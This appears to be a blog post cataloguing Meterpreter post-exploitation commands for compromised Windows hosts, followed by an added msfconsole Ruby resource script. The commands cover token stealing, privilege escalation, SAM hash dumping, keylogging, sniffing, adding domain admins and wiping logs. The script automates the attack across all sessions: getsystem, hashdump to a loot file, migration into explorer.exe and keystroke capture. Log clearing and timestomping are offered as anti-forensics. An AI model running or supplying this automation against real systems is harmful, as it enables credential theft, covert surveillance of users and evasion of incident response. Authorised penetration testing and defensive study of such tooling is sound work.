Monday, March 11, 2013

Meterpreter Commands


Here is a list of some Meterpreter commands that can be used for post exploitation. Unless noted otherwise they are typed at the meterpreter > prompt of a Windows session; commands that belong to an extension (priv, incognito, sniffer, espia) only exist once that extension has been loaded.
 
- screengrab
 Take a screenshot of the victim's desktop (provided by the espia extension, so run load espia first; the stdapi command screenshot below does the same thing)
 
- run scriptname
 Run a Meterpreter script; for a full list check the scripts/meterpreter directory. The same command also runs post modules (run post/windows/gather/hashdump), which have replaced most of the old scripts
 
 - sysinfo
 Show the system information on the remote target
 
 - ls
 List the files and folders on the target
 
- use priv (load priv in current versions; use is the older alias)
 Load the privilege extension (getsystem, hashdump, timestomp). Recent versions load it automatically in Windows sessions, so this is rarely needed
 
- use incognito (load incognito in current versions)
 Load the incognito extension, used for listing, stealing and impersonating Windows access tokens on the target machine
 
 - list_tokens -u
 List available tokens on the target by user
 
- list_tokens -g
List available tokens on the target by group
 
- impersonate_token DOMAIN_NAME\\USERNAME
Impersonate a token available on the target
 
- steal_token PID
 Steal the primary token of the given process (PID from ps) and impersonate it. Opening another user's process usually requires SYSTEM, so run getsystem first
 
 - drop_token
 Stop impersonating the current token
 
- getsystem
 Attempt to elevate to NT AUTHORITY\SYSTEM by trying several techniques in turn (named pipe impersonation, token duplication). All of them need local administrator rights on the target, so check the outcome with getuid afterwards
 
- shell
 Drop into an interactive command shell (cmd.exe on Windows) running under the token the session currently holds, impersonated or not; type exit to return to Meterpreter
 
- execute -f cmd.exe -i
 Execute cmd.exe and interact with it

- execute -f cmd.exe -i -t
 Execute cmd.exe using the currently impersonated token (-t), so the new process runs as the user whose token you took with impersonate_token or steal_token

- execute -f cmd.exe -i -H -t
 Same as above, but start it as a hidden process (-H) so no window appears on the user's desktop
 
- rev2self
 Revert to the token the session started with, dropping any impersonation done with impersonate_token, steal_token or getsystem
 
- reg command
 Interact with the target's registry. The subcommands are enumkey, createkey, deletekey, queryclass, setval, deleteval and queryval; the key is given with -k, the value name with -v and the data with -d
 
- setdesktop number (current versions take -w WindowStation -n Desktop instead of a number)
 Switch the desktop the session is attached to. Screenshots and keystroke capture only see that desktop, so switch to the interactive one (WinSta0\Default) when a user is logged in; enumdesktops lists the available window stations and desktops
 
 - screenshot
 Take a screenshot of the target’s screen
 
- keyscan_start
 Start sniffing keystrokes on the remote target. Only keystrokes delivered to the desktop of the process Meterpreter lives in are captured, so migrate into the logged-on user's explorer.exe first (or into winlogon.exe, as SYSTEM, to capture logon passwords)
 
 - keyscan_dump
 Dump the remote keys captured on the target
 
 - keyscan_stop
 Stop sniffing keystrokes on the remote target
 
- getprivs
 Enable every privilege the current token is allowed to hold (SeDebugPrivilege and the like) and list them; it cannot grant privileges the token does not have
 
- hashdump
 Dump the local SAM password hashes in user:rid:lm:ntlm::: form. Reading the SAM needs SYSTEM, so run getsystem first; on a domain controller this still gives only the local accounts
  
- use sniffer (load sniffer in current versions)
 Load the sniffer extension; it captures in the memory of the target process without installing a driver, and the capture is never written to the target's disk

- sniffer_interfaces
 List the available interfaces on the target, with the interface IDs the other sniffer commands use

- sniffer_start interfaceID [packet-buffer]
 Start capturing on an interface; the optional packet buffer is how many packets are kept in memory before the oldest are dropped (the default is 50000)

- sniffer_dump interfaceID pcapname
 Write the packets captured so far to a pcap file on the attacker's machine. This does not start a capture; sniffer_start does

- sniffer_stop interfaceID
 Stop the sniffer
 
- add_user username password -h ip
 Add a user on the host ip (an incognito command; it uses the currently impersonated token, which must have administrator rights on that host)

- add_group_user "Domain Admins" username -h ip
 Add the user to the Domain Admins group on host ip, normally run against the domain controller while impersonating a domain admin token; add_localgroup_user does the same for a local group
 
- clearev
 Clear the Application, System and Security event logs on the target. Note that Windows records the wipe itself (Security event 1102 "The audit log was cleared", System event 104), and any logs already forwarded to a collector are untouched

- timestomp file options
 Change a file's MACE timestamps (modified, accessed, created, entry modified) as an antiforensics measure: -v shows them, -f otherfile copies another file's times, -b blanks them, -z sets all four. Only the $STANDARD_INFORMATION timestamps are changed; the $FILE_NAME timestamps in the MFT record are not, and forensic tools compare the two
 
 - reboot
 Reboot the target machine
 
 - help
 The ‘help’ command, as may be expected, displays the Meterpreter help menu.
 
- background
 The 'background' command will send the current Meterpreter session to the background and return you to the msf prompt. sessions -l lists the live sessions and sessions -i N brings one back to the foreground.
 
- ps
The ‘ps’ command displays a list of running processes on the target.
 
- migrate PID
 Move the Meterpreter session into another process (PID is the target process ID from the ps output). migrate is a core command, not a post module. Migrate into a long-lived process such as explorer.exe (to see the logged-on user's desktop and keystrokes) or a SYSTEM service so the session survives if the original process exits; your current token must be able to open the process you migrate into.
 
- download
 The 'download' command downloads a file from the remote machine into the local working directory. Note the use of double backslashes when giving the Windows path: a single backslash is treated as an escape character. Forward slashes also work.
 
- upload
 The 'upload' command copies a local file to the remote machine. As with 'download', use double backslashes in the Windows path:
meterpreter > upload trojan.exe c:\\windows\\system32
 
- ipconfig
The ‘ipconfig’ command displays the network interfaces and addresses on the remote machine.
 
- getuid
Running ‘getuid’ will display the user that the Meterpreter server is running as on the host.
 
- execute
The ‘execute’ command runs a command on the target.
 
- idletime
Running ‘idletime’ will display the number of seconds that the user at the remote machine has been idle.
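The token and privilege workflow above (getuid, getsystem, list_tokens, hashdump) and the keystroke capture (migrate, keyscan_start, keyscan_dump, keyscan_stop) are usually chained the same way every time, so they lend themselves to an msfconsole resource script. The script below is an added example for this post, not code from the original page or from the Metasploit project. It assumes msfconsole's resource-script syntax with a <ruby> block (which exposes framework and the console's print_status, print_good and print_error helpers), a live Meterpreter session on a Windows host, and the session API names sys.config.getuid, sys.config.sysinfo, priv.getsystem, priv.sam_hashes, sys.process.get_processes, core.migrate, ui.keyscan_start, ui.keyscan_dump, ui.keyscan_stop and run_cmd. The loot directory layout, the file names and the 30 second capture window are my own choices.

```msf
# post_tokens.rc  (added example; run with "msfconsole -r post_tokens.rc"
# or "resource post_tokens.rc" from a console that already holds sessions)
#
# For every live Meterpreter session: record who we are, try getsystem,
# show the tokens incognito can see, dump SAM hashes only if we really are
# SYSTEM, then migrate into the logged-on user's explorer.exe and capture
# keystrokes there, because keyscan only sees the desktop of the process
# Meterpreter lives in.
<ruby>
require 'fileutils'

loot_dir = ::File.join(Msf::Config.loot_directory, 'post_tokens')  # assumed layout
FileUtils.mkdir_p(loot_dir)
keyscan_seconds = 30                                                # assumed window

framework.sessions.each_pair do |sid, s|
  next unless s.type == 'meterpreter'

  info = s.sys.config.sysinfo
  uid  = s.sys.config.getuid
  print_status("Session #{sid} on #{info['Computer']} (#{info['OS']}) runs as #{uid}")

  # getsystem needs local admin for its named-pipe / token-duplication
  # techniques and raises instead of returning false, so rescue and re-check.
  unless uid =~ /SYSTEM\z/
    begin
      s.priv.getsystem
    rescue ::Exception => e
      print_error("Session #{sid}: getsystem failed: #{e.message}")
    end
    uid = s.sys.config.getuid
  end

  # incognito is an extension: load it before its commands exist.
  # run_cmd hands a line to the session's console exactly as if typed.
  s.run_cmd('load incognito')
  print_status("Session #{sid}: tokens visible as #{uid}:")
  s.run_cmd('list_tokens -u')

  if uid =~ /SYSTEM\z/
    path = ::File.join(loot_dir, "#{info['Computer']}_#{sid}.hashes")
    ::File.open(path, 'w') do |f|
      s.priv.sam_hashes.each { |h| f.puts(h.to_s) }   # user:rid:lm:ntlm:::
    end
    print_good("Session #{sid}: SAM hashes written to #{path}")
  else
    print_error("Session #{sid}: still #{uid}; impersonate_token a SYSTEM token from the list above, or steal_token a SYSTEM PID, then rerun")
    next
  end

  # Keystrokes: migrate into the logged-on user's explorer.exe. This trades
  # SYSTEM for that user's token, which is why it comes after hashdump.
  explorer = s.sys.process.get_processes.find { |p| p['name'].casecmp('explorer.exe').zero? }
  unless explorer
    print_error("Session #{sid}: no explorer.exe running, nobody is logged on interactively")
    next
  end
  print_status("Session #{sid}: migrating to explorer.exe (PID #{explorer['pid']}, #{explorer['user']})")
  s.core.migrate(explorer['pid'])
  s.ui.keyscan_start
  print_status("Session #{sid}: capturing keystrokes for #{keyscan_seconds}s")
  sleep(keyscan_seconds)
  keys = s.ui.keyscan_dump
  s.ui.keyscan_stop
  ::File.open(::File.join(loot_dir, "#{info['Computer']}_#{sid}.keys"), 'a') { |f| f.puts(keys) }
  print_good("Session #{sid}: captured #{keys.length} characters of keystrokes")
end
</ruby>
```

Two design points. The SYSTEM check is done by re-reading getuid rather than trusting getsystem's return value, because a session that was already SYSTEM, or one where elevation silently fell back, looks the same to the operator only through that check. And the capture target is chosen per purpose: explorer.exe for what the user types after logon, whereas logon passwords are typed on the Winlogon desktop and need a migration into winlogon.exe while still SYSTEM, in which case the migrate step belongs before rev2self-style token changes rather than after.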
